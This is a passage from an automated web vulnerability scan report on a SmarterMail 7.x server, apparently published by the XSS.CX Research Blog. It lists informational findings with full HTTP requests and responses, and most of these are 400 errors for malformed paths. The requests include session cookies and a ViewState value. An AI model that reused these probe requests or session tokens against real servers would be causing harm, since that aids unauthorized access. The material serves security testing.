Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 2232

chkallcolumn=on&ctl00_MPH_HyperGrid1_HiddenInput=&chk_column_1=on&__VIEWSTATE=%2fwEPDwUJNDY0MTY0NDQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDkN1cnJlbnRDb2x1bW5zMpwJAAEAAAD%2f%2f%2f%2f%
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:53 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:53 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.38. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/javascript:ClosePopup()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/javascript:ClosePopup()

Request

GET /UserControls/Popups/javascript:ClosePopup() HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.39. http://vulnerable.SmarterMail 7.x.host:9998/http:/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/

Request

GET /http:/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.40. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/

Request

GET /http:/www.smartertools.com/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.41. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/

Request

GET /http:/www.smartertools.com/Help/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.42. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/SmarterMail/

Request

GET /http:/www.smartertools.com/Help/SmarterMail/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.43. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/SmarterMail/v7/

Request

GET /http:/www.smartertools.com/Help/SmarterMail/v7/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.44. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx

Request

GET /http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:56 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

Report generated by XSS.CX Research Blog at Fri Oct 01 22:28:49 EDT 2010.